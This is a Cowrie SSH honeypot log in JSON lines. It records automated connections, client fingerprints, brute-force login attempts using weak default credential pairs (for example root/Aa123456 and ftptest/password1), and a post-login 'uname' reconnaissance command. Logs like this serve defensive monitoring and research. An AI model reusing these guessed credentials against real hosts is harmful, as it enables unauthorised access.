{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:27.086889Z","src_ip":"41.226.27.251","session":"011340bbbffa"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:27.218279Z","src_ip":"41.226.27.251","session":"011340bbbffa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:28.544704Z","src_ip":"41.226.27.251","session":"011340bbbffa"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:48:37.132617Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58286,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e146f72a778","protocol":"ssh","message":"New connection: 212.227.125.160:58286 (1.2.3.4:22) [session: 9e146f72a778]","sensor":"my-vps","timestamp":"2025-08-31T02:48:37.332506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:37.854412Z","src_ip":"212.227.125.160","session":"9e146f72a778"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:48:37.885209Z","src_ip":"212.227.125.160","session":"9e146f72a778"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47064,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ec55481234a","protocol":"ssh","message":"New connection: 212.227.235.229:47064 (1.2.3.4:22) [session: 4ec55481234a]","sensor":"my-vps","timestamp":"2025-08-31T02:48:39.268548Z"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"password","message":"login attempt [ftptest/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:40.185604Z","src_ip":"212.227.125.160","session":"9e146f72a778"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:41.711342Z","src_ip":"212.227.125.160","session":"9e146f72a778"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:41.905259Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:41.905990Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:48:42.759930Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:48:42.760576Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:44.525172Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.session.closed","duration":"24.6","message":"Connection lost after 24.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:44.559458Z","src_ip":"212.227.125.160","session":"22912d6fef78"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38724,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa6d1d209eab","protocol":"ssh","message":"New connection: 41.226.27.251:38724 (1.2.3.4:22) [session: fa6d1d209eab]","sensor":"my-vps","timestamp":"2025-08-31T02:48:47.634470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:48:47.635230Z","src_ip":"41.226.27.251","session":"fa6d1d209eab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:48:47.678184Z","src_ip":"41.226.27.251","session":"fa6d1d209eab"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-31T02:48:47.808455Z","src_ip":"41.226.27.251","session":"fa6d1d209eab"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:49.134822Z","src_ip":"41.226.27.251","session":"fa6d1d209eab"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:48:52.650560Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52536,"dst_ip":"1.2.3.4","dst_port":22,"session":"af280f40f359","protocol":"ssh","message":"New connection: 217.72.205.35:52536 (1.2.3.4:22) [session: af280f40f359]","sensor":"my-vps","timestamp":"2025-08-31T02:48:53.644354Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:48:53.645518Z","src_ip":"217.72.205.35","session":"af280f40f359"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37318,"dst_ip":"1.2.3.4","dst_port":22,"session":"10c023b4e088","protocol":"ssh","message":"New connection: 212.227.125.160:37318 (1.2.3.4:22) [session: 10c023b4e088]","sensor":"my-vps","timestamp":"2025-08-31T02:48:55.621636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:06.871205Z","src_ip":"212.227.125.160","session":"10c023b4e088"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:49:06.944615Z","src_ip":"212.227.125.160","session":"10c023b4e088"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35248,"dst_ip":"1.2.3.4","dst_port":22,"session":"b773addaf8f9","protocol":"ssh","message":"New connection: 41.226.27.251:35248 (1.2.3.4:22) [session: b773addaf8f9]","sensor":"my-vps","timestamp":"2025-08-31T02:49:07.687923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:07.693447Z","src_ip":"41.226.27.251","session":"b773addaf8f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:49:07.733386Z","src_ip":"41.226.27.251","session":"b773addaf8f9"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T02:49:07.910241Z","src_ip":"41.226.27.251","session":"b773addaf8f9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:09.121636Z","src_ip":"41.226.27.251","session":"b773addaf8f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:49:11.965298Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:49:11.966172Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49026,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9d34cbfcab4","protocol":"ssh","message":"New connection: 212.227.235.229:49026 (1.2.3.4:22) [session: d9d34cbfcab4]","sensor":"my-vps","timestamp":"2025-08-31T02:49:15.910193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:17.066514Z","src_ip":"212.227.235.229","session":"d9d34cbfcab4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:49:17.067729Z","src_ip":"212.227.235.229","session":"d9d34cbfcab4"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"password1","message":"login attempt [ftptest/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:49:22.713759Z","src_ip":"212.227.235.229","session":"d9d34cbfcab4"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:24.779102Z","src_ip":"212.227.235.229","session":"d9d34cbfcab4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"13.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 13.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:25.857799Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.session.closed","duration":"46.9","message":"Connection lost after 46.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:26.145501Z","src_ip":"212.227.235.229","session":"4ec55481234a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57912,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5c5a37e1d59","protocol":"ssh","message":"New connection: 41.226.27.251:57912 (1.2.3.4:22) [session: e5c5a37e1d59]","sensor":"my-vps","timestamp":"2025-08-31T02:49:27.997263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:28.017707Z","src_ip":"41.226.27.251","session":"e5c5a37e1d59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:49:28.047558Z","src_ip":"41.226.27.251","session":"e5c5a37e1d59"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:49:28.241508Z","src_ip":"41.226.27.251","session":"e5c5a37e1d59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40452,"dst_ip":"1.2.3.4","dst_port":22,"session":"d61a8ea76196","protocol":"ssh","message":"New connection: 212.227.235.229:40452 (1.2.3.4:22) [session: d61a8ea76196]","sensor":"my-vps","timestamp":"2025-08-31T02:49:28.501355Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:29.462513Z","src_ip":"41.226.27.251","session":"e5c5a37e1d59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39512,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb2d47582434","protocol":"ssh","message":"New connection: 212.227.125.160:39512 (1.2.3.4:22) [session: eb2d47582434]","sensor":"my-vps","timestamp":"2025-08-31T02:49:37.558352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:38.116422Z","src_ip":"212.227.125.160","session":"eb2d47582434"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:49:38.141873Z","src_ip":"212.227.125.160","session":"eb2d47582434"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"password1","message":"login attempt [ftptest/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:49:40.490503Z","src_ip":"212.227.125.160","session":"eb2d47582434"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:41.662969Z","src_ip":"212.227.235.229","session":"d61a8ea76196"}
